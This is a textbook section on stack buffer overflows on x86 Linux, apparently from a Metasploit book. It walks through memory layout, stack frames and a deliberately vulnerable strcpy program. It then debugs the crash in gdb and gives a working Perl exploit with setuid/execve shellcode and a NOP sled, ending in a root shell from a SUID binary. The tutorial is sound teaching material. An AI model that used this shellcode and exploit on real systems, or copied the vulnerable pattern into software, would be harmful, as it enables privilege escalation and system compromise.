Section 5.2. Overview of Stack Buffer Overflows

5.2. Overview of Stack Buffer Overflows

Security problems have always been an issue in software. From users abusing time-sharing operating systems in the '70s to the remote network compromises of the current day, software always hasand always will havesecurity bugs. Starting in the late 1980s a new type of software vulnerability known as overflows began to be exploited. Since then overflows have become the undisputed king of vulnerabilities, accounting for the majority of security advisories in the last 10 years.

What follows is a brief refresher on stack-based buffer overflows and how you can exploit them. This section is intended as an overview only, so feel free to skip ahead if you already have a firm grasp on the subject.

5.2.1. Memory Segments and Layout

In general, today's operating systems (OSes) support two levels of protected memory areas in which processes can run: user space and kernel space. The kernel space is where the core processes of the OS execute. The user space is where user-level processessuch as daemonsexecute. A discussion of memory corruption attacks should focus on two areas: kernel space attacks and user-level processes. Kernel space attacks are beyond the scope of this chapter and really aren't what MSF was designed for, so we'll focus on user-space processes. Attacks against these processes can be generalized in local and remote attacks. MSF in general is used to exploit programs that listen for remote network connections, and in the example module later in this chapter, we'll focus on this kind of attack.

Before discussing how to exploit process memory, it is necessary to understand how the virtual memory for user-level processes is organized. The following paragraphs discuss the Linux operating system on the x86 architecture. Many of the general concepts will apply to other operating systems and architectures.

When the OS initializes a process, it maps five main virtual memory segments. Each segment has a specific purpose and can either have a fixed size or grow as needed. Table 5-2 describes each standard" mmory segment in Linux. The code, data, and BSS segments are populated with information from the executable during process initialization. The heap and stack typically have fixed starting positions but then grow according to a program's instructions. It should be noted that wherever a static buffer exists in memory, it can overflow. However, our discussion will focus on stack segment buffer overflows, as they account for the majority of exploited overflows.

Table 5-2. Relevant user-space virtual memory segments

Segment name

Description

Code

This segment contains the actual instructions the program will execute.

Data

This segment contains global and static variables with initialized values.

BSS

This segment contains global and static variables that are uninitialized.

Heap

This segment is for dynamic memory allocations.

Stack

This segment is a memory range for allocation of variables local to a function and is thus dynamic, depending on the function call tree.

When the process has finished initialization, the segments will be ordered, as shown in Figure 5-1.

Figure 5-1. Virtual memory layout of a process

Now that we've looked at and described the memory segments, let's see in exactly which segments the variables in our code will be located. Here is a C code snippet that illustrates the memory regions where the variables will be allocated when the program is run:

int global_initialized = 311;      //located in the data segment
char global_uninitialized;         //located in the bss segment

int main( ){
    int local_int;                         //located on the stack
    static char local_char;        //located in the bss segment
    char *local_ptr;               //located on the stack
    local_ptr =(char *)malloc(12); //local_ptr points to 
                                   //a buffer located on the heap
    char buffer[12];               //entire buffer located on the stack
    return 0;
}

5.2.2. How a Buffer Overflows and Why It Matters

A process can allocate memory using stack or heap segments. Heaps allow the allocation of memory dynamically using C functions such as malloc( ), but with this comes the overhead of the OS's internal dynamic memory allocation routines. Stacks are more convenient for developers because the declaration syntax is simpler, and there is no overhead from dynamic memory allocation routines of the OS.

A stack is a last-in-first-out (LIFO) queue. The common stack operators are push (to add to the end of the stack) and pop (to remove the last item placed on the stack). These operators are used on the Assembly level by instructions with the same name. The stack is 32 bits wide and usually has a static starting position. Its size is governed by the extended base pointer (EBP) and extended stack pointer (ESP) CPU registers, but it typically grows "down." As it grows, the top of the stack (ESP) gets closer to the lowest virtual memory address, as in Figure 5-2. Also shown in Figure 5-2 is the ESP register, which points to the top of the stack. The EBP register serves a special purpose, as it identifies the start of a stack frame by pointing to the bottom of the current stack frame. A stack frame is an area of memory that holds the local function variables as well as the arguments that were passed to the function that is executing. Stack frames are allocated by subtracting from the value of EBP and moving the bottom of the stack frame up the stack. The program performs these actions using a small series of Assembly instructions known as prolog and epilog.

Figure 5-2. Key elements of the stack segment

When a new function is called, the address of the callee's next instruction is pushed onto the stack. This address is where the extended instruction pointer (EIP) should point when the called function returns control to the callee. Then the prolog pushes the callee function's EBP onto the stack and moves the EBP to point to the ESP. As seen in the code snippets in Table 5-3, this creates a new stack frame where space for new local variables can be allocated by simply subtracting from ESP to grow the stack.

Table 5-3. An example C program and its x86 disassembly

Example C program

x86 disassembly

1| void example( ){

1| example:

2| int i;

2| push %ebp

3| }

3| mov %esp,%ebp

4| int main( ){

4| sub $0x4,%esp

5| example( );

5| leave

6| }

6| ret

7| main:

8| push %ebp

9| mov %esp,%ebp

10| sub $0x8,%esp

11| call 0x8048310 <example>

12| leave

13| ret

In Table 5-3 a new stack frame is created when a new function gets called. Because there are two functions, we'll have two stack frames. In the disassembly, it's possible to identify where new stack frames are created by looking for three things: the prolog, the epilog, and use of the call instruction. Lines 8 and 9 of the disassembly show the prolog for the main function. Lines 2 and 3 show the prolog for the example function.

As the main function starts, the prolog sets up the new stack frame. Then a new frame for the example function begins on line 11. The call instruction pushes a pointer to the next instruction onto the top of the stack. Once in the example function, the function's prolog generates the next stack frame. On line 4, the stack size is adjusted by 4 bytes; this is the space needed to store the integer variable i. Finally, the example function's epilog executes on lines 5 and 6. It essentially reverses the actions of the prolog and erases the stack frame.

The epilog is important because the ret instruction returns control to the calling function. It sets the new instruction pointer based on the value stored on the stack during the call instruction. This is the key to what makes stack overflows so dangerous. Pointers that influence program flow are located on the stack. If these pointers can be overwritten, we can gain control of the program's execution.

Here is a sample C code snippet that takes one user-controlled input and copies it to a fixed-size stack buffer:

/* vuln.c */
int main(int argc, char **argv){
    char fixed_buf[8];
    if(argc<2){exit(-1);}
    strcpy(fixed_buf,argv[1]);
    return 0;
}

In the following section, the program will be compiled and traced with a debugger to show the overflow process in action. By using a program argument of AAAAAAAABBBBCCCC, we can see how saved EIP (sEIP) is overwritten. Figure 5-3 shows the stack frame before and after strcpy( ) to illustrate the stack's status after the overwrite. Note that the ASCII codes for the characters A, B, and C are 0x41, 0x42, and 0x43, respectively. Also notice that the sEIP is being overwritten with values we control!

Figure 5-3. The stack frame and setup before and after strcpy

Some compilers align stack buffers differently; depending on your compiler it might take more input to fully overwrite the sEIP with the example value 0x43434343.

5.2.3. Shellcode

The good news is that now we have a way of controlling program flow. At this point we need what is commonly referred to as shellcode. Shellcode is a set of assembly instructions in which program flow can be redirected and perform some functionality. The term "shellcode" was coined to reflect the fact that it contains Assembly instructions that execute a shell (command interpreter), often at higher privilege levels. But where should we place this shellcode? Because we already used our user input buffer to take control of EIP, there is no reason we can't use the same buffer to serve a dual purpose by also including the shellcode directly in the buffer. Because this overflow is occurs in a C-style string, we should write the shellcode to avoid the NULL delimiting byte.

In an ideal world of exploitation, the top of the stack wouldn't move and we could jump to this known location every time. But in the real world of remote exploits many factors affect where the top of the stack will be on program return, so we need a solution for dealing with these variations in where our shellcode will lie.

One way of dealing with this problem is to use what is commonly known as a NOP sled. The NOP assembly instruction performs "no operation." It basically does nothing and has no effect on any CPU registers or flags. What is good about this is that we can prepend our shellcode with a buffer that consists solely of the bytes that represent the NOP instruction; on x86 architecture this is 0x90. This technique compensates for the stack's unpredictability by changing program flow to anywhere within the NOP sled, and the execution will continue up the buffer until it hits the shellcode.

Putting together the concepts we learned so far, we now can construct user input to take control of program execution and run arbitrary shellcode. Figure 5-4 shows what our final buffer for the first program argument will look like.

Figure 5-4. Final construction of the input buffer

The known values in this buffer are the shellcode and the NOP sled. For local exploits such as this one, you should use a shellcode that does setuid( ) and exec( ) to spawn the new root-level shell. The aforementioned \x90 character will be used to fill the NOP sled. In our example, the values to be used for the "filler space" buffer can be arbitrary printable ASCII, so we'll use the character A. The final unknown is the new EIP valuethat is, the memory location we hope will be within our NOP sled. This new EIP value is commonly known as the return. To find it, use a debugger to examine the process memory after using a trace buffer to trigger the vulnerability. We construct a trace buffer so that it is visually easier to find key areas of buffer in memory.

First, compile the executable with debugging symbols:

$ gcc vuln.c -o vuln -g

Next, run the gdb debugger. Once in the gdb shell, run the program with a simple trace buffer generated from the command line using Perl:

$ gdb -q vuln
(gdb) run `perl -e 'print "A"x28 . "1234" . "C"x1024'`
Starting program: /home/cabetas/research/book/vuln `perl -e 
'print "A"x28 . "1234" . "C"x1024'`

Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ( )
(gdb) x/x $esp
0xbfff8d60:     0x43434343
(gdb) x/x $esp+1020
0xbfff915c:     0x43434343
(gdb) print ($esp+512)
$1 = (void *) 0xbfff8f60

Note that the buffer's structure is modeled after what our eventual exploit buffer will look like, with the bytes 1234 directly overwriting the sEIP and the Cs representing where our NOP sled will be. Also note that in this example the compiler aligned my buffer in such a way that it took 28 bytes before overwriting sEIP.

The program generates a segmentation fault, which signifies that it attempted to access an unmapped area of memory. This memory location is 0x34333231, the ASCII code equivalent of 4321.

Little-Endian Memory Values

Why did our sEIP overwrite come out backward from our input? The answer has to do with how memory values are stored on x86 architectures. The little-endian format stores values in reverse byte order. For our example, the overwritten value of 1234 becomes 0x34333231 in little-endian order and 0x31323334 in big-endian order. The byte values remain the same, but they are switched so that the most significant byte is written first.

After the program crashes, examine the memory located at the stack pointer (ESP). You'll notice it points to byte values that represent the letter C. If you examine the memory before and after ESP you'll see the buffer actually starts here and the last four-byte block is located at $esp+1020. Because this is where we will eventually place our NOP sled, we want to find a value within this range. We will use the $esp+512 value because it's the midpoint of the buffer, and it has the highest chance of success. Now we have the new EIP value that the exploited program will return to: 0xbfff8f60.

5.2.4. Putting It All Together: Exploiting a Program

All the elements of our exploit buffer are in place: the filler, the new EIP the program will return to, the NOP sled, and our shellcode. It's time to try it out from the command line outside the debugger. Here is a Perl script that generates an exploit buffer using the previously discussed values. Note that the pack( ) function handles the little-endian conversion:

#!/usr/bin/perl
# File: exploit_buffer.pl
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
                "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
                "\x80\xe8\xdc\xff\xff\xff/bin/sh";
my $return = 0xbfff8f60;
print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;

The chown and chmod commands are used to set up our example program as a set user ID (SUID) application. These commands cause the program to be executed at the root user's privilege level. This is done to demonstrate the effect of an exploited SUID root program in the wild.

$ su
Password:
# chown root:root ./vuln
# chmod +s ./vuln
# exit
$ ls -la vuln
-rwsrwsr-x    1 root     root         5817 Jan 24 05:50 vuln

Now, for the actual exploitation of the program; use the ` (backtick) character to execute the Perl script that generates our exploit buffer. This buffer becomes the first argument to our vulnerable program. As previously mentioned, the overflowed program overwrites the sEIP address to our new return value which should point into our NOP sled. Execution continues up the NOP sled until our shellcode executes, giving us root access.

$./vuln `perl exploit_buffer.pl`
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

If you are using Perl version 5.8.0 or newer with UNICODE support, you should unset the LANG environment variable to ensure that functions such as pack( ) work as expected. Various parts of MSF will fail otherwise. As a test, the following shell command should print the number 4 when your locale settings are correct:

perl -e 'print pack("V",0xffffffff);' |wc -c